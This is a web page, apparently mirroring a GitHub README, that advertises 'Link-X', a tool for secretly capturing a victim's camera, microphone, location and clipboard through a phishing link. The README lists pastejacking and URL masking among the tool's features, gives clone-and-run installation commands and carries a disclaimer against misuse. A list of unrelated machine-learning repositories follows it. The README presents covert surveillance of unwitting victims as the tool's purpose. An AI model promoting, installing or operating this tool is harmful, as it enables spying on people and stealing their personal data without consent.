Hack Camera, Microphone, Location, Clipboard With Just a Link. Also, Get Many Details About Victim's Device. And So On...

Related tags

Deep LearningLink-X
Overview

Link-X

An Automated Tool to Hack Victim's Camera, Microphone, Location, Clipboard. Has 2 Extra Features.

Version 1.1 Update

  • Fixed Some Major Bugs
  • Data Saving Directory Changed To Storage Folder

    Features

  • Hack Camera
  • Hack Microphone
  • Hack Clipboard
  • Hack Location
  • Get So Many Details about Victim's Device. As much as Possible...
  • Prank Victim Using PasteJacking
  • Supports Custom HTML page to Show to Victim.
  • Supports URL Masking

    Supported Port Forwardings

  • Localhost
  • CloudFlared
  • Ngrok

    Installation Commands

    apt update -y
    apt upgrade -y
    pkg install python git -y
    git clone https://github.com/Toxic-Noob/Link-X
    cd Link-X
    bash setup.sh
    python link-x.py
    

    Note

    [*] USE IT, AT YOUR OWN RISK

    [*] ToxicNoob is not Responsible for Any Misuse

    Contact

    [*] Contact with Me via Email

    [email protected]

    Tool ScreenShots :

    Link-X 1 Link-X 2 Link-X 3 Link-X 4

    Visitors :

    Visitor Count

  • Owner
    ToxicNoob
    From an Ordinary country, I'm an Extraordinary Person.
    ToxicNoob
    Turning SymPy expressions into PyTorch modules.

    sympytorch A micro-library as a convenience for turning SymPy expressions into PyTorch Modules. All SymPy floats become trainable parameters. All SymP

    Patrick Kidger 89 Dec 13, 2022
    A New Approach to Overgenerating and Scoring Abstractive Summaries

    We provide the source code for the paper "A New Approach to Overgenerating and Scoring Abstractive Summaries" accepted at NAACL'21. If you find the code useful, please cite the following paper.

    Kaiqiang Song 4 Apr 03, 2022
    ByteTrack(Multi-Object Tracking by Associating Every Detection Box)のPythonでのONNX推論サンプル

    ByteTrack-ONNX-Sample ByteTrack(Multi-Object Tracking by Associating Every Detection Box)のPythonでのONNX推論サンプルです。 ONNXに変換したモデルも同梱しています。 変換自体を試したい方はByteT

    KazuhitoTakahashi 16 Oct 26, 2022
    Official implementation of ACTION-Net: Multipath Excitation for Action Recognition (CVPR'21).

    ACTION-Net Official implementation of ACTION-Net: Multipath Excitation for Action Recognition (CVPR'21). Getting Started EgoGesture data folder struct

    V-Sense 171 Dec 26, 2022
    Conditional Gradients For The Approximately Vanishing Ideal

    Conditional Gradients For The Approximately Vanishing Ideal Code for the paper: Wirth, E., and Pokutta, S. (2022). Conditional Gradients for the Appro

    IOL Lab @ ZIB 0 May 25, 2022
    [3DV 2021] Channel-Wise Attention-Based Network for Self-Supervised Monocular Depth Estimation

    Channel-Wise Attention-Based Network for Self-Supervised Monocular Depth Estimation This is the official implementation for the method described in Ch

    Jiaxing Yan 27 Dec 30, 2022
    PyTorch implementation of SimCLR: A Simple Framework for Contrastive Learning of Visual Representations

    PyTorch implementation of SimCLR: A Simple Framework for Contrastive Learning of Visual Representations

    Thalles Silva 1.7k Dec 28, 2022
    Deep Ensembling with No Overhead for either Training or Testing: The All-Round Blessings of Dynamic Sparsity

    [ICLR 2022] Deep Ensembling with No Overhead for either Training or Testing: The All-Round Blessings of Dynamic Sparsity by Shiwei Liu, Tianlong Chen, Zahra Atashgahi, Xiaohan Chen, Ghada Sokar, Elen

    VITA 18 Dec 31, 2022
    Exploring Visual Engagement Signals for Representation Learning

    Exploring Visual Engagement Signals for Representation Learning Menglin Jia, Zuxuan Wu, Austin Reiter, Claire Cardie, Serge Belongie and Ser-Nam Lim C

    Menglin Jia 9 Jul 23, 2022
    Blender add-on: Add to Cameras menu: View → Camera, View → Add Camera, Camera → View, Previous Camera, Next Camera

    Blender add-on: Camera additions In 3D view, it adds these actions to the View|Cameras menu: View → Camera : set the current camera to the 3D view Vie

    German Bauer 11 Feb 08, 2022
    Implementation of U-Net and SegNet for building segmentation

    Specialized project Created by Katrine Nguyen and Martin Wangen-Eriksen as a part of our specialized project at Norwegian University of Science and Te

    Martin.w-e 3 Dec 07, 2022
    Geometric Vector Perceptrons --- a rotation-equivariant GNN for learning from biomolecular structure

    Geometric Vector Perceptron Implementation of equivariant GVP-GNNs as described in Learning from Protein Structure with Geometric Vector Perceptrons b

    Dror Lab 142 Dec 29, 2022
    "Reinforcement Learning for Bandit Neural Machine Translation with Simulated Human Feedback"

    This is code repo for our EMNLP 2017 paper "Reinforcement Learning for Bandit Neural Machine Translation with Simulated Human Feedback", which implements the A2C algorithm on top of a neural encoder-

    Khanh Nguyen 131 Oct 21, 2022
    Dynamic Realtime Animation Control

    Our project is targeted at making an application that dynamically detects the user’s expressions and gestures and projects it onto an animation software which then renders a 2D/3D animation realtime

    Harsh Avinash 10 Aug 01, 2022
    CSAC - Collaborative Semantic Aggregation and Calibration for Separated Domain Generalization

    CSAC Introduction This repository contains the implementation code for paper: Co

    ScottYuan 5 Jul 22, 2022
    Self-Supervised Multi-Frame Monocular Scene Flow (CVPR 2021)

    Self-Supervised Multi-Frame Monocular Scene Flow 3D visualization of estimated depth and scene flow (overlayed with input image) from temporally conse

    Visual Inference Lab @TU Darmstadt 85 Dec 22, 2022
    Unofficial PyTorch implementation of Guided Dropout

    Unofficial PyTorch implementation of Guided Dropout This is a simple implementation of Guided Dropout for research. We try to reproduce the algorithm

    2 Jan 07, 2022
    Marvis is Mastouri's Jarvis version of the AI-powered Python personal assistant.

    Marvis v1.0 Marvis is Mastouri's Jarvis version of the AI-powered Python personal assistant. About M.A.R.V.I.S. J.A.R.V.I.S. is a fictional character

    Reda Mastouri 1 Dec 29, 2021
    Official implementation of TMANet.

    Temporal Memory Attention for Video Semantic Segmentation, arxiv Introduction We propose a Temporal Memory Attention Network (TMANet) to adaptively in

    wanghao 94 Dec 02, 2022
    SCALoss: Side and Corner Aligned Loss for Bounding Box Regression (AAAI2022).

    SCALoss PyTorch implementation of the paper "SCALoss: Side and Corner Aligned Loss for Bounding Box Regression" (AAAI 2022). Introduction IoU-based lo

    TuZheng 20 Sep 07, 2022